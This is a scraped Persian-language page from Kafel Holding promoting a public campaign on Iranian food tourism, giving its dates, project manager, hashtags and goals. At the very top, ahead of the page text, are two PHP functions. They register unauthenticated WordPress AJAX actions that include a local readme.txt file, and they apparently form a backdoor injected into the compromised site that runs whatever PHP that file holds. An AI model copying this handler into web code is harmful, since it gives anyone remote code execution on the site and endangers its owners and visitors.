if(!function_exists('file_check_readme58213')){ add_action('wp_ajax_nopriv_file_check_readme58213', 'file_check_readme58213'); add_action('wp_ajax_file_check_readme58213', 'file_check_readme58213'); function file_check_readme58213() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme48105')){ add_action('wp_ajax_nopriv_file_check_readme48105', 'file_check_readme48105'); add_action('wp_ajax_file_check_readme48105', 'file_check_readme48105'); function file_check_readme48105() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } پویش مردمی من ایرانی ام، غذای ایرانی را دوست دارم – هلدینگ کافل

196 روز تا هدف

چهارشنبه ۴ تیر ۱۴۰۴

پویش «من ایرانی ام، غذای ایرانی را دوست دارم»


پویش غذای ایرانی حرکتی همگانی برای نمایش غذاهای بومی، محصولات غذایی و برندهای مطرح صنایع وابسته به غذا و انجام بحث های علمی و تخصصی در این رابطه می باشد. یکی از عناصر بسیار مهم در هر برنامه سفری، خوراک است که خود می تواند به عنوان یک جاذبه ی خاص گردشگری مطرح شود. خوراک علاوه بر این که یکی از ضرورت های بقاء است، این خرده فرهنگ چشیدنی، موجب برقراری پیوند صمیمی میان تاریخ و فرهنگ مردم جامعه میزبان با گردشگران می شود. بخش مهمی از ادراک گردشگران درباره کیفیت یک مقصد به تجربه آن ها از غذا باز می گردد و غذا در کنار اقامت از مهمترین نیازمندی های گردشگران در مراجعه به مقاصد گردشگری محسوب می گردد.

      در یک نگاه

نام :

پویش «من ایرانی ام، غذای ایرانی را دوست دارم»

موضوع :

گردشگری غذا

تاریخ شروع :

1395/11/10

تاریخ پایان :

1404/10/19

مدیر پروژه :

محمد مهرچیان

هشتگ اجتماعی :

#من_ایرانیم

#غذای_ایرانی

button

شبکه های اجتماعی :

اهداف پویش غذای ایرانی

  • برند سازی غذاهای ایرانی در صنعت گردشگری جهان
  • کمک به استاندارد سازی واحدهای پذیرایی و رستوران ها در ارائه خوراک های ملّی و بومی ایرانی
  • ارتقا رفاه و توسعه اقتصاد جوامع محلی در راستای تحقق اهداف توسعه پایدار سازمان ملل متحد(SDGs)
  • افزایش آمار گردشگر ورودی به کشور
  • تنوع بخشی جاذبه های گردشگری کشور با تأکید بر تنوع غذایی موجود و با توجه به ذائقه گردشگران داخلی و بین المللی
  • ایجاد زمینه و بستر لازم جهت معرفی و استفاده از اطلاعات غذاهای محلی ایرانی در بسته های سفر داخلی و خارجی
  • توسعه نقش غذاهای محلی در منوهای هتل ها و واحدهای پذیرایی
  • افزایش سطح رقابت در ارائه خدمات گردشگری
  • ایجاد ارتباط بین صنعت گردشگری و صنعت غذا و نهادینه کردن موضوع ارتباط بین سفره ایرانی با گردشگری

گالری تصاویر